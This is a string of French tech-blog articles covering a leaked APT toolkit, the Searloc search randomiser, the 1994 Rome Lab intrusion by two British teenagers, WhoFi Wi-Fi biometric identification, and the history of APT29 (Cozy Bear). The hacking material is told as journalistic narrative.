Ce qui rend cette affaire assez unique, c’est qu’elle nous offre un aperçu rare et non filtré des coulisses du cyber-espionnage étatique. D’habitude, on découvre les outils et techniques des APT après coup, en analysant leurs attaques comme des archéologues numériques qui reconstituent un dinosaure à partir de fragments d’os. Mais là, on a accès directement à leur boîte à outils complète, leurs notes, leurs cibles, leurs méthodes de travail au quotidien.

Les implications sont d’ailleurs énormes pour la communauté cybersécurité. Avec cet accès privilégié aux TTPs (Tactics, Techniques, and Procedures) de l’opérateur, les équipes de défense peuvent maintenant :

• Identifier des patterns d’attaque pour créer des signatures de détection plus précises
• Comprendre l’infrastructure C2 utilisée et bloquer proactivement les domaines et IPs associés
• Analyser les vulnérabilités exploitées et patcher en priorité
• Attribuer d’anciennes attaques non résolues grâce aux similarités dans le code et les méthodes
• Former les analystes SOC avec des exemples réels d’attaques APT

Un acteur APT, habitué à opérer dans l’ombre avec l’impunité que confère le soutien d’un État-nation, s’est donc fait avoir par deux hackers indépendants qui ont ensuite balancé tout son arsenal sur Internet. C’est plutôt marrant quand on sait que ces groupes APT passent leur temps à voler les secrets des autres !

Cobalt Strike, l’outil préféré des APT (et des red teamers légitimes)

L’incident soulève quand même des questions cruciales sur l’attribution des cyberattaques. Le fait que cet opérateur pourrait être chinois mais imiter les techniques nord-coréennes montre à quel point il est difficile d’identifier avec certitude l’origine d’une attaque, car ans le monde du cyber-espionnage, les fausses pistes et les opérations sous faux drapeau sont monnaie courante.

C’est d’ailleurs pour ça que les groupes APT chinois et nord-coréens adorent se faire passer les uns pour les autres. Les Chinois ont leurs propres groupes legendaires comme APT1 (Comment Crew), APT28 (Fancy Bear… non attendez ça c’est les Russes !), ou APT40 (Leviathan). Les Nord-Coréens ont Lazarus (ceux du hack de Sony Pictures et du ransomware WannaCry), Bluenoroff / APT38 (spécialisés dans le vol bancaire, 81 millions de dollars à la Bangladesh Bank en 2016 !), et notre fameux Kimsuky.

La différence de style entre les groupes est d’ailleurs fascinante. Les Russes préfèrent exploiter des zero-days pour un impact géopolitique immédiat. Les Chinois ciblent les supply chains pour du vol de propriété intellectuelle à long terme. Les Nord-Coréens ? Eux ils ont besoin de cash, donc ils font dans le ransomware et le vol de crypto. En 2024, ils auraient volé plus de 3 milliards de dollars en cryptomonnaies selon les estimations !

Mais revenons à notre opérateur mystère. L’analyse de son infrastructure révèle des détails croustillants. Il utilisait des VPS loués avec des bitcoins minés spécifiquement pour l’opération (ces mecs ont leur propre ferme de minage !). Les domaines C2 étaient enregistrés via des registrars russes et chinois avec de fausses identités. Les certificats SSL étaient générés avec Let’s Encrypt pour paraître légitimes. Tout un écosystème criminel parfaitement rodé… jusqu’à ce que Saber et cyb0rg débarquent.

Et balancer une telle bombe pendant DEF CON, c’est s’assurer un maximum d’impact dans la communauté (la preuve, j’en parle). En tout cas, il y a une certaine justice poétique à voir un cyber espion se faire espionner à son tour.

Aujourd’hui avec ces révélations, le message envoyé à tous les groupes APT est clair : vous n’êtes pas intouchables. Même avec le soutien d’un État, même avec des budgets illimités, même avec les meilleurs outils, vous pouvez vous faire pwn par deux hackers motivés.

Je pense que cette affaire restera dans les annales car pour la première fois, ce n’est pas une agence de renseignement occidentale qui expose un groupe APT, mais des hackers indépendants. Cela me rappelle le leak de Conti qui avait subit la même chose mais de la part d’un insider (enfin, on le pense…).

Bref, si vous êtes un opérateur APT, évitez de réutiliser vos mots de passe et configurez correctement vos services cloud, sinon vous finirez en une de Phrack avec tous vos petits secrets étalés sur Internet. C’est con mais c’est comme ça !

Et pour les chercheurs en sécurité, foncez analyser ces 9GB de données, c’est Noël avant l’heure !

Sources : HackRead - 9GB APT Data Leak, Dark Reading - APT Actor Data Dump Analysis, DDoSecrets - APT Down: The North Korea Files, Phrack Magazine Issue #72, Wikipedia - Distributed Denial of Secrets, CISA - Kimsuky APT Advisory

Pensez un peu à la tête des publicitaires si chacune de vos recherches web partait dans une direction complètement aléatoire, comme une boule de flipper qui rebondit entre 50 bumpers différents ? Et bien c’est exactement ce que fait Searloc, et vous allez voir, c’est assez malin.

Alexandre, un développeur français visiblement allergique au pistage en ligne, vient de créer quelque chose d’intéressant. Au lieu de chercher directement sur Google ou même DuckDuckGo, son outil vous envoie de manière totalement aléatoire vers l’une des 50 instances publiques SearXNG disponibles.

Ainsi, aucune instance ne voit plus de 2% de vos recherches, comme ça, pour les trackers qui essaient de créer votre profil, c’est comme essayer de reconstituer un puzzle avec seulement 1 pièce sur 50.

Le plus beau dans tout ça, c’est que Searloc fonctionne entièrement côté client. Pas de serveur, pas de base de données, pas de logs. Juste du JavaScript qui tourne dans votre navigateur et qui tire au sort votre prochaine destination. Je trouve que c’est vraiment une excellente approche de ne pas avoir de serveur fixe, car ça élimine complètement le point de centralisation.

Pour ceux qui ne connaissent pas, SearXNG est un métamoteur qui peut interroger jusqu’à 248 services de recherche différents sans jamais transmettre votre IP ou vos cookies aux moteurs sous-jacents. C’est déjà pas mal niveau privacy, mais le problème c’est que si vous utilisez toujours la même instance, l’administrateur pourrait théoriquement reconstituer votre historique de recherche. Avec Searloc, ce risque disparaît puisque vos recherches sont éparpillées façon puzzle.

L’outil propose quelques fonctionnalités sympa. Par exemple, si les résultats ne vous conviennent pas, tapez simplement “!!” et hop, votre recherche repart sur une autre instance aléatoire. Les bangs (ces raccourcis qui commencent par “!!”) sont gérés localement, donc même vos recherches spécialisées restent privées. Et pour les maniaques du contrôle, vous pouvez même ajouter vos propres instances SearXNG personnelles dans les paramètres.

Faut quand même dire que les alternatives privacy-first comme Startpage, Brave Search ou Qwant se multiplient face à l’appétit insatiable de Google pour nos données, mais là où ces services restent centralisés (même s’ils promettent de ne pas vous tracker… vous savez qui engage ce genre de promesse…), Searloc pousse la logique encore plus loin en décentralisant complètement le point d’entrée.

Maintenant, pour l’utiliser, rien de plus simple. Rendez-vous sur searloc.org et vous tapez votre recherche. L’interface reprend automatiquement vos préférences de thème et de langue pour les transmettre à l’instance SearXNG sélectionnée.

Et le code source est disponible sur Codeberg sous licence MIT, donc les paranos qui on du temps libre peuvent vérifier qu’il n’y a pas d’entourloupe.

Voilà, ce qui me plaît dans cette approche, c’est surtout qu’elle résout élégamment le dilemme de la privacy où soit vous faites confiance à un service centralisé qui promet de ne pas vous tracker (mais qui reste un point unique de défaillance), soit vous auto-hébergez votre instance (mais c’est technique et votre IP reste visible pour les sites que vous visitez). Searloc trouve ainsi un juste milieu en distribuant le risque sur des dizaines d’instances différentes.

Alors oui, c’est vrai, parfois vous tomberez sur une instance un peu lente ou qui affichera des captchas parce qu’elle a été trop sollicitée mais c’est un léger inconvénient de cette décentralisation. Parce qu’entre ça et laisser Google construire un profil psychologique détaillé de toutes vos interrogations existentielles à 3h du mat’, le choix est vite fait.

Merci à Alexandre d’avoir partagé son projet avec moi !

Aujourd’hui dans ma série “les ados qui ont failli déclencher la Troisième Guerre mondiale”, je vous présente l’histoire complètement dingue de Mathew et Richard, respectivement 21 ans de Cardiff et 16 ans de la banlieue londonienne, qui ont réussi l’exploit de faire trembler le Pentagone armés d’un simple modem 56k et d’une obsession maladive pour les petits hommes verts.

Le Pentagone, cette forteresse imprenable… sauf pour deux ados obsédés par X-Files

Si comme moi, vous êtes fans de X-Files, vous allez kiffer cette histoire. Mathew Bevan, alias “Kuji”, et Richard Pryce, surnommé “Datastream Cowboy” (déjà rien que les pseudos, c’est tout un programme) ont piraté pendant des mois les systèmes les plus secrets de l’armée américaine. Et leur but étaint encore plus fou : Prouver que le gouvernement américain cache l’existence des extraterrestres. Cheh !

Et ils ont effectivement réussi à s’introduire dans ces systèmes ultra-sensibles. Pire encore, ils ont failli créer un incident diplomatique majeur. Un agent du Pentagone a même qualifié Kuji de “plus grande menace pour la paix mondiale depuis Adolf Hitler”. Rien que ça ! C’est beau, j’en suis ému.

L’histoire commence donc dans les bureaux du Rome Laboratory à Griffiss Air Force Base, dans l’État de New York. Les administrateurs système découvrent qu’un programme espion, un “sniffer”, a été installé clandestinement sur leur réseau et le machin avait collecté tellement de mots de passe et d’informations qu’il avait saturé le disque dur et fait crasher le système. Breeeef, imaginez la tronche des admins : le laboratoire de recherche le plus secret de l’US Air Force, celui qui développe l’intelligence artificielle militaire et les systèmes de guidage radar, venait de se faire trouer comme un emmental.

Rome Laboratory, le cerveau technologique de l’US Air Force… infiltré par deux ados

Le 28 mars 1994, Jim Christy, chef des investigations cybercriminelles de l’Air Force Office of Special Investigations (AFOSI) de l’époque, reçoit l’appel qui va bouleverser sa vie.

“On a un problème”, lui annonce son équipe. Ancien de la NSA reconverti dans la lutte contre la cybercriminalité militaire, Christy comprend immédiatement l’ampleur du désastre. Rome Lab, c’est pas n’importe quoi, c’est l’endroit où se développent les armes du futur de l’armée américaine.

L’équipe de Christy découvre alors rapidement que les intrus utilisent deux pseudonymes : “Datastream” et “Kuji”. Deux hackers fantômes qui se baladent dans les systèmes militaires américains comme dans leur salon mais le pire reste à venir puisqu’ils utilisent les serveurs compromis de Rome Lab comme tremplin pour attaquer d’autres cibles : La NASA, Wright-Patterson Air Force Base (vous savez, là où sont censés être planqués les aliens), Hanscom Air Force Base, et même des contractants de défense en Californie et au Texas.

Pendant 26 jours, Christy et ses équipes surveillent les deux pirates sans intervenir. Ils veulent comprendre l’ampleur de l’attaque et remonter jusqu’aux coupables. Ce qu’ils découvrent les fait flipper grave : plus de 150 intrusions sur Rome Lab, des téraoctets de données sensibles copiées, des emails d’officiers lus et effacés, et des programmes de simulation de champ de bataille téléchargés. Hé oui, c’est qu’ont découvert les enquêteurs.

Jim Christy quelques années avant la traque des cyber-intrus

Mais le véritable moment de panique arrive quand les agents voient Datastream tenter d’accéder à un ordinateur dans un laboratoire nucléaire en Corée.

“Holy shit”, se dit Christy. On est en 1994, les États-Unis sont en pleine négociation tendue avec la Corée du Nord sur son programme nucléaire alors si les Nord-Coréens détectent une attaque sur leur installation nucléaire venant d’une base aérienne américaine, ils vont croire à un acte de guerre.

Les agents retiennent leur souffle. Heureusement, ils découvrent par la suite que la cible était en Corée du Sud, pas au Nord. Mais Datastream a quand même téléchargé les données du Korean Atomic Energy Research Institute et les a transférées sur les serveurs de l’US Air Force. Et si les Sud-Coréens découvrent ce transfert, c’est l’incident diplomatique assuré. Elle est pas belle la vie ?

Mais alors qui est ce mystérieux Kuji qui fait trembler le Pentagone ? Et bien c’est Mathew Bevan, né le 10 juin 1974 à Cardiff, au Pays de Galles. Un gamin qui vit un calvaire à l’école, harcelé par ses camarades, en difficulté scolaire, alors la nuit, pendant que ses parents dorment, il trouve refuge dans les bulletin boards (BBS) et les premiers forums Internet.

L’univers de Mathew Bevan : une chambre, un ordinateur, et des rêves d’extraterrestres

C’est là qu’il découvre le phone phreaking, l’art de manipuler les systèmes téléphoniques pour passer des appels gratuits n’importe où dans le monde. Cette compétence devient son passeport pour le monde du hacking et un jour, quelqu’un lui donne accès à Sin City, un bulletin board belge, repaire de hackers bien connu de l’époque. En échange de ses techniques de phone phreaking, les habitants de Sin City lui offrent alors documents et méthodes pour pirater des ordinateurs.

Mais le véritable déclic arrive quand Bevan tombe sur Destiny Stone, un bulletin board géré par un phone phreaker australien surnommé Ripmax. “Ce que j’ai trouvé sur son système, c’étaient des centaines de documents sur les OVNIs, les dissimulations gouvernementales et les théories du complot”, se souvient Bevan. Il y découvre notamment l’histoire de 40 hackers qui auraient disparu mystérieusement après avoir ciblé des systèmes militaires pour découvrir la vérité sur les OVNIs.

X-Files - La série qui a inspiré toute une génération de hackers conspirationnistes

Et là, c’est le moment “eureka” de Bevan car si ces 40 hackers ont disparu en cherchant la vérité sur les OVNIs, c’est qu’il y a forcément quelque chose à cacher. Sa mission est donc toute trouvée : reprendre là où les disparus se sont arrêtés, pirater chacune des bases militaires citées par le magazine underground PHRACK, et prouver une bonne fois pour toutes que le gouvernement américain cache l’existence des extraterrestres.

En 1994, Bevan entre alors en contact via IRC avec Richard Pryce, un gamin de 16 ans passionné de musique et d’informatique. Pryce, qui se fait appeler “Datastream Cowboy”, partage la même fascination pour les théories du complot. Il admire les compétences techniques de son aîné et accepte de devenir son “apprenti” dans cette quête de vérité.

IRC : le terrain de jeu des hackers des années 90

C’est Pryce qui découvre Rome Laboratory par hasard, en scannant les adresses IP du réseau militaire américain. “Regarde ce que j’ai trouvé”, écrit-il à Kuji. “Un labo de recherche de l’Air Force avec des sécurités ridiculement faibles.” Bevan comprend immédiatement l’opportunité. Rome Lab est un nœud central du réseau militaire américain, une porte d’entrée vers des dizaines d’autres installations.

Mais contrairement aux espions professionnels, les deux compères ne cherchent pas à passer inaperçus. Ils laissent des traces partout, copient des gigaoctets de données sans discrimination, et communiquent entre eux sans précaution particulière. C’est cette négligence va permettre à Christy de les traquer.

Pour traquer les deux fantômes, l’AFOSI fait appel à son réseau d’informateurs sur Internet. Un de ces informateurs parvient à entrer en contact avec Datastream Cowboy sur Cyberspace, un fournisseur d’accès à Seattle. Le gamin, naïf et impatient de communiquer avec d’autres hackers, tombe alors directement dans le piège et donne son numéro de téléphone personnel à l’informateur.

Le 12 mai 1994, Scotland Yard arrête Richard Pryce à son domicile de Colindale. Le gosse est terrorisé et il avoue tout : les intrusions dans Rome Lab, les attaques contre la NASA, le transfert des données coréennes. Mais surtout, il balance son complice Kuji, même s’il ne connaît pas sa véritable identité.

Pryce comparaît devant la Woolwich Crown Court en mars 1996. Il plaide coupable pour 12 infractions au Computer Misuse Act britannique et écope d’une amende dérisoire de 1 200 livres sterling. Pas de prison, pas de casier judiciaire lourd.

Pendant ce temps, Christy continue sa traque obsessionnelle de Kuji et l’AFOSI met des moyens considérables sur l’enquête. Les experts en profilage psychologique dressent un portrait-robot : homme, entre 25 et 35 ans, très intelligent, formation scientifique, probablement financé par une organisation étatique. Le Senate Permanent Subcommittee on Investigations va même jusqu’à qualifier Kuji “d’agent étranger, possiblement d’origine est-européenne”.

Ils se plantent complètement puisque Kuji n’est qu’un jeune employé informatique de Cardiff, obsédé par X-Files et financé par son maigre salaire dans une petite boîte galloise. Breeeef, les profileurs du FBI peuvent aller se rhabiller.

Le matos de Mathew Bevan à l’époque

Le 21 juin 1996, à l’aube, une escouade de Scotland Yard débarque chez Mathew Bevan. Ils s’attendent à tomber sur un espion professionnel, un agent dormant est-européen et ils découvrent un geek de 21 ans vivant chez ses parents dont la chambre est tapissée d’affiches d’X-Files et de science-fiction. “Les agents ont finalement découvert que l’identité de Kuji était Mathew Bevan, 21 ans, un informaticien avec une fascination pour la science-fiction”, rapporte le dossier d’enquête.

Bevan est arrêté et inculpé, mais contrairement à son jeune complice, il refuse de coopérer. Son père étant policier, il connaît ses droits et prend un avocat. S’ensuit un bras de fer judiciaire de 20 audiences. En novembre 1997, coup de théâtre : le Crown Prosecution Service abandonne toutes les charges. “Décision commerciale”, justifie le procureur. Traduction : ça coûte trop cher et l’opinion publique s’en fout.

Bevan sort libre mais marqué à vie. “Je ne peux plus faire de mal à une mouche maintenant”, confie-t-il. Il se reconvertit dans la sécurité informatique éthique, rejoint Tiger Computer Security, devient développeur chez Nintendo, et finit par fonder sa propre entreprise, Kuji Media Corporation. L’ironie de l’histoire veut que l’ancien pirate du Pentagone soit aujourd’hui payé pour empêcher d’autres de faire ce qu’il a fait.

De hacker à protecteur : la reconversion réussie de Mathew Bevan

Quant à Pryce, traumatisé par son arrestation, il disparaît complètement des radars. Après la confiscation de son ordinateur, il n’en rachète même pas un nouveau. Certains disent qu’il a repris ses études de musique, d’autres qu’il s’est reconverti totalement. Une chose est sûre : l’expérience l’a vacciné à vie contre le hacking.

Le rapport d’évaluation des dégâts, publié le 31 octobre 1994, chiffre les pertes directes de l’US Air Force à 211 722 dollars, sans compter les coûts de l’enquête et du nettoyage des systèmes. Mais les enquêteurs admettent n’avoir découvert que la partie émergée de l’iceberg. Combien d’autres Kuji et Datastream Cowboy se baladent dans les systèmes militaires américains ? On verra bien…

Avant 1994, les militaires américains considéraient leurs réseaux comme protégés par leur complexité technique mais après Kuji et Datastream Cowboy, ils comprennent qu’Internet a aboli les frontières et que n’importe quel ado avec un modem peut devenir une menace nationale. Cette prise de conscience va déclencher une révolution dans la cybersécurité militaire, avec des milliards de dollars investis pour sécuriser ce que deux gamins britanniques avaient démontré être un gruyère numérique.

Et la mauvaise nouvelle, c’est que malgré des mois d’intrusions dans les systèmes les plus secrets de l’US Air Force et de la NASA, Bevan n’a jamais trouvé la moindre preuve de l’existence d’extraterrestres. Pas de débris de Roswell, pas de documents sur la Zone 51, pas de technologies aliens. “J’ai fouillé partout”, confiera-t-il. “Wright-Patterson, la NASA, tous les endroits où étaient supposés être cachés les secrets sur les OVNIs. Rien, nada, que dalle.”

Cette conclusion aurait dû clore le débat, mais les théoriciens du complot ont retourné l’argument : si Kuji n’a rien trouvé, c’est justement la preuve que la conspiration existe et qu’elle est plus complexe et secrète que ce qu’on pourrait imaginer. The truth is ‘still’ out there, comme dirait Mulder… Mais elle n’est pas dans les serveurs du Pentagone visiblement…

Sources : Security in Cyberspace - Rome Laboratory Case Study, Wikipedia - Mathew Bevan, Kuji Media - Confessions of a hacker, InformIT - The Rome Labs Case, ISC2 - 30 Years After Two Kids Broke into the Air Force, Cryptologic Foundation - 1994: Griffiss Air Force Base finds malware

Ce matin au petit déj, je suis tombé sur un doc de recherche qui m’a fait recracher mon café soluble tout dégeu des vacances : des scientifiques italiens peuvent maintenant vous reconnaître à 95,5% juste en analysant comment votre corps déforme les signaux Wi-Fi. Et le pire, c’est que ça marche même à travers les murs.

Les chercheurs de l’Université La Sapienza de Rome (Danilo Avola, Daniele Pannone, Dario Montagnini et Emad Emam) ont baptisé leur bébé “WhoFi”, et celui-ci utilise ce qu’on appelle le CSI (Channel State Information) pour créer une sorte d’empreinte biométrique basée sur la façon dont votre corps interfère avec les ondes Wi-Fi.

En gros, quand une onde Wi-Fi traverse votre corps, elle est modifiée de manière unique par vos os, vos organes, votre composition corporelle. C’est comme si votre squelette et vos entrailles créaient une signature radio personnelle. Les chercheurs ont donc entraîné un réseau de neurones profonds avec une architecture Transformer (oui, comme pour ChatGPT) pour reconnaître ces patterns uniques.

Le plus flippant dans tout ça, c’est que contrairement aux caméras qui ne voient que votre surface, le Wi-Fi pénètre littéralement à l’intérieur de vous. Votre densité osseuse, la forme de vos organes…etc tout ça crée des distorsions spécifiques dans le signal. C’est comme si on pouvait vous scanner en permanence sans que vous le sachiez.

Pour tester leur système, l’équipe a utilisé le dataset NTU-Fi, une référence dans le domaine du sensing Wi-Fi. Et là, bam ! 95,5% de précision pour identifier les personnes. C’est énorme. Pour vous donner une idée, EyeFi, un système similaire développé en 2020, plafonnait à 75%. On parle donc d’une amélioration de 20 points, ce qui est colossal dans ce domaine.

Mais attendez, c’est pas fini car le truc vraiment balèze avec WhoFi, c’est qu’il n’a pas besoin d’être réentraîné pour chaque nouveau point d’accès. Le modèle Transformer peut généraliser et s’adapter à de nouvelles conditions sans avoir besoin d’apprendre spécifiquement chaque environnement. En clair, une fois que le système vous connaît, il peut vous reconnaître partout où il y a du Wi-Fi. Et s’il y a plus du tout de Wi-Fi c’est que c’est moi qui suis dans le coin parce que je bloque tout à cause des moules frites à volonté d’hier soir ^^.

Imaginez les implications d’une telle techno. Vous entrez dans un café, un magasin, un aéroport, et hop, vous êtes identifié sans même vous connecter au Wi-Fi. Pas besoin de sortir votre téléphone, pas besoin de badge, votre corps fait office de carte d’identité ambulante. C’est à la fois très cool et terrifiant. Les chercheurs se défendent en disant que leur système est plus “privacy-preserving” que les caméras traditionnelles parce qu’il ne capture pas d’images…. Mouais, permettez-moi d’être sceptique. Certes, on ne voit pas votre tête, mais on peut vous traquer partout où il y a du Wi-Fi, et ça, c’est partout de nos jours.

Le CSI, pour ceux qui se demanderaient, c’est en fait l’information sur l’état du canal Wi-Fi. Chaque fois qu’un signal Wi-Fi est transmis, il contient des données sur comment le signal a été affecté pendant son voyage. C’est normalement utilisé pour optimiser la transmission, mais les chercheurs ont détourné ça pour en faire un outil d’identification.

Voilà donc pour les bonnes nouvelles…

Bien sûr, ce n’est pas nouveau que les chercheurs s’intéressent au Wi-Fi pour détecter des trucs. On a déjà vu des systèmes capables de détecter des chutes, de reconnaître des gestes, ou même de voir à travers les murs, mais là, on franchit un cap avec l’identification précise des individus.

Pour être honnête, la technologie en elle-même est bluffante. Utiliser des variations d’amplitude et de phase dans les signaux Wi-Fi pour créer une signature biométrique unique, c’est très malin je trouve surtout que les chercheurs ont même implémenté des techniques de data augmentation pour rendre le système plus robuste au bruit et aux variations mineures du signal.

Le problème c’est si cette technologie devient omniprésente sans que personne ne s’en rende compte car contrairement aux caméras qui sont visibles ou aux lecteurs d’empreintes qui nécessitent votre coopération, le Wi-Fi est invisible et dispo partout. Vous pourriez donc être tracké du moment où vous entrez dans un bâtiment jusqu’à votre sortie, avec une précision chirurgicale. Et si c’est couplé à d’autre techno, ce sera encore pire : reconnaissance faciale + tracking Wi-Fi + géolocalisation GPS… On arrivera alors à un niveau de surveillance qui ferait passer “1984” d’Orwell pour un conte de fées.

Les chercheurs affirment que pour l’instant, c’est purement académique et qu’il n’y a pas d’applications commerciales ou gouvernementales prévues, mais soyons réalistes deux secondes. Une technologie capable d’identifier les gens à quasi 100% sans aucun équipement spécial autre que des routeurs Wi-Fi standards, les agences de renseignement et les entreprises de marketing doivent déjà se frotter les mains.

Et pour se protéger de ça, ça devient compliqué. Porter une armure en plomb ? Pas très pratique. Brouiller les signaux Wi-Fi autour de vous ? Illégal dans la plupart des pays. Non, en vrai on n’a pas vraiment de solution pour l’instant.

Heureusement, certains chercheurs travaillent déjà sur des contre-mesures. Des techniques comme le “CSI fuzzing” ou la randomisation CSI sont explorées pour protéger la vie privée. L’idée est de modifier les signaux pilotes pour corrompre les informations CSI tout en préservant la communication normale.

Bref, pour conclure, WhoFi est une prouesse technologique indéniable mais comme souvent avec ce genre d’innovation, la question n’est pas “peut-on le faire ?” mais “devrait-on le faire ?” car dans notre monde où la vie privée est déjà bien bien mise à mal, rajouter une couche de surveillance invisible et omniprésente me semble être un peu too much…

Source : WhoFi: Deep Person Re-Identification via Wi-Fi Channel Signal Encoding

Cet article fait partie de ma série de l’été spécial hackers. Bonne lecture !

Aujourd’hui les amis, je vais vous raconter l’histoire du groupe de hackers le plus patient et le plus sophistiqué au monde. APT29, aussi connu sous les doux noms de Cozy Bear, The Dukes ou maintenant Midnight Blizzard, c’est l’élite absolue du cyber-espionnage russe. Ce sont des espions qui peuvent squatter vos systèmes pendant des années, qui matent vos emails les plus confidentiels, qui observent chacun de vos mouvements numériques, et tout ça dans la plus grande discrétion.

Ces types ont piraté la Maison Blanche, le Pentagone, le Département d’État américain, et j’en passe. Mais en 2014, les services secrets néerlandais ont réussi l’impensable : ils ont piraté ces pirates ! Je vous raconte tout ça !!

Siège du SVR à Moscou, d’où sont orchestrées les opérations d’APT29

L’histoire d’APT29 commence bien avant que le monde ne connaisse leur nom. Les premiers signes de leur activité remontent à 2008, et certains experts pensent même qu’ils opéraient déjà dès 2004. À l’époque, personne ne savait vraiment qui ils étaient. On voyait juste des attaques ultra-sophistiquées contre des gouvernements occidentaux, des think tanks, des organisations internationales.

Ce qui distinguait déjà ces attaques des autres, c’était leur patience légendaire. Là où d’autres groupes de hackers font du “smash and grab”, ils entrent, ils volent, ils sortent, APT29 s’installait pour des mois, voire des années. Ils observaient, ils apprenaient, ils attendaient. C’était de l’espionnage à l’ancienne, mais avec des moyens modernes. Du coup, c’est pas pour rien qu’on les appelle “Cozy Bear”, l’ours douillet qui hiberne tranquillement dans vos systèmes.

Le nom “Cozy Bear” leur a été donné par CrowdStrike, une société de cybersécurité américaine car dans leur système de nomenclature, tous les groupes russes sont des “ours”. Et y’a du monde au zoo : Fancy Bear (APT28, lié au GRU, le renseignement militaire), Venomous Bear, Primitive Bear… Mais Cozy Bear, c’est ceux qui s’installe pépère dans vos systèmes en attendant le bon moment.

Les autres noms liés à ce groupe sont tout aussi évocateurs. “The Dukes” fait référence à leur famille de malwares : MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, GeminiDuke… Chaque “Duke” a sa spécialité, ses capacités uniques. C’est l’équivalent d’une boîte à outils mais pour faire du cyber espionnage ultra-sophistiqué.

Maintenant, parlons technique deux secondes. Le cœur de MiniDuke, découvert en 2013, était écrit entièrement en assembleur ce qui est un choix assez insolite mais qui montre l’excellent niveau des développeurs. Le malware pesait seulement 20KB, pouvait télécharger des modules additionnels selon les besoins et éviter la détection par les antivirus traditionnels. CozyDuke, lui, utilisait des certificats volés pour signer ses composants et se faire passer pour du code légitime.

Mais revenons à cette incroyable histoire néerlandaise. En 2014, les cyber-espions du Joint Sigint Cyber Unit (JSCU), l’unité cyber conjointe des services de renseignement néerlandais (AIVD et MIVD), bossent sur une piste. Cette unité d’élite de 80-100 personnes a pour mission de répérer des activités cheloues et de remonter leurs traces. Ce qu’ils découvrent alors dépasse leurs espérances les plus folles.

Non seulement ils parviennent à infiltrer le réseau utilisé par APT29, mais ils découvrent aussi quelque chose d’extraordinaire : le groupe opère depuis un bâtiment universitaire près de la Place Rouge à Moscou. Et cerise sur le gâteau, y’a des caméras de surveillance partout dans le bâtiment. Les Néerlandais prennent le contrôle de ces caméras, et hop, c’est l’arroseur arrosé !

La Place Rouge à Moscou, tout près du QG secret d’APT29

Pendant au moins un an, voire jusqu’à deux ans et demi selon les sources, c’est l’opération de contre-espionnage du siècle. Les Néerlandais regardent littéralement par-dessus l’épaule des hackers russes. Ils voient qui entre et sort du bureau. Ils identifient des agents du SVR grâce aux images. Ils observent les hackers lancer leurs attaques en temps réel. C’est comme me regarder bosser en live Twitch, mais avec des vrais espions russes !

Et là, ça part en sucette car l’AIVD voit APT29 attaquer le Département d’État américain en novembre 2014. Ils alertent alors immédiatement leurs homologues américains : “Hé les gars, vos systèmes sont en train de se faire défoncer, voici exactement ce que font les Russes.” Les Américains sont sur le cul. C’est du renseignement en temps réel d’une qualité exceptionnelle.

Le Département d’État américain, première cible majeure observée par les Néerlandais

Quand APT29 s’attaque ensuite à la Maison Blanche fin 2014, les Néerlandais sont encore là, à observer. Les Russes accèdent aux notes confidentielles non classifiées du président Obama et à son agenda et les Américains sont tellement reconnaissants de l’aide néerlandaise qu’ils établissent des canaux de communication ultra-sécurisés entre les deux agences. Du jamais vu dans l’histoire du renseignement.

L’attaque contre le Pentagone en août 2015 est un autre exemple de la sophistication d’APT29. Ils utilisent une technique de spear-phishing c’est à dire des emails ciblés qui semblent légitimes. L’email contient un lien vers ce qui semble être un article d’actualité sur les tensions en Ukraine mais quand la victime clique, c’est le début de l’infiltration.

Le Pentagone paralysé pendant deux semaines par APT29

Et le malware utilisé est une merveille d’ingénierie. Il vérifie d’abord si la machine est intéressante. Si c’est juste un PC lambda, il reste dormant par contre, si c’est une machine avec des accès privilégiés, il s’active et commence à explorer le réseau. Il communique alors avec ses serveurs de commande en utilisant des techniques de stéganographie cachant des données dans des images innocentes postées sur des sites web légitimes. Ces mecs sont des artistes !

L’attaque paralyse le système mail non classifié de l’état-major des armées pendant deux semaines. 4000 militaires et civils travaillant pour l’état-major américain sont affectés. C’est très embarrassant pour la première puissance militaire mondiale, mais c’est surtout inquiétant car si APT29 peut faire subir ça au Pentagone, que peuvent-ils faire d’autre ?

Mais c’est l’attaque contre le Democratic National Committee (DNC) en 2015-2016 qui va vraiment faire connaître APT29 au grand public. Ils infiltrent le réseau du DNC dès l’été 2015, presque un an avant l’élection présidentielle et pendant des mois, ils lisent tranquillement les emails, ils téléchargent des documents, ils observent.

Bureaux du DNC à Washington

Et là, c’est le bordel complet ! APT29 n’est pas seul sur ce coup. APT28 (Fancy Bear), l’autre groupe de hackers russes lié au GRU, débarque sur le réseau du DNC début 2016. Les deux groupes ne semblent pas coordonner leurs actions. C’est même le contraire : ils se marchent sur les pieds, ils utilisent des techniques différentes, ils ont des objectifs différents.

APT29, fidèle à sa réputation, est discret. Ils collectent du renseignement, point barre. APT28, c’est l’inverse. Ils sont bruyants, agressifs. Ce sont eux qui vont leaker les documents du DNC via WikiLeaks et DCLeaks. Deux services de renseignement russes, deux approches complètement différentes. C’est comme si la DGSE et la DGSI se marchaient dessus pendant une opération. Bref, du grand n’importe quoi !

APT28 et APT29, deux façons de procéder bien différentes

Les Néerlandais observent tout ça en temps réel. Ils voient APT29 opérer, ils comprennent que c’est grave. D’ailleurs, leur renseignements servent de base à l’enquête du FBI sur l’ingérence russe dans l’élection de 2016 et sans les Néerlandais, on n’aurait peut-être jamais su à quel point l’opération était sophistiquée.

Malheureusement, l’accès néerlandais à APT29 se tarit entre 2016 et 2017. Des journalistes néerlandais de Volkskrant et Nieuwsuur révèlent l’histoire en janvier 2018, et suggèrent que des déclarations indiscrètes de hauts responsables américains ont grillé l’opération. Les Russes ont compris qu’ils étaient surveillés et ont changé leurs méthodes. L’AIVD était furieux !! Des années de travail ruinées par des grandes gueules !

Le QG de l’AIVD à Zoetermeer, d’où fut menée l’opération contre APT29

Mais APT29 ne disparaît pas pour autant. Au contraire, ils évoluent, ils s’adaptent. En 2018, on les voit utiliser de nouveaux malwares comme WellMess et WellMail. En 2020, pendant la pandémie, ces enfoirés s’attaquent aux centres de recherche travaillant sur les vaccins COVID-19 aux États-Unis, au Royaume-Uni et au Canada. Leur objectif c’est de voler les formules, les données des essais cliniques et les informations sur la chaîne d’approvisionnement.

C’est cynique au possible, mais c’est logique du point de vue du renseignement russe car pourquoi dépenser des milliards en R&D quand on peut simplement voler le travail des autres ? Les pays occidentaux dénoncent, mais APT29 continue puisqu’ils sont protégés par l’État russe et qu’ils sont intouchables.

Les laboratoires de recherche COVID-19, nouvelles cibles d’APT29 en 2020

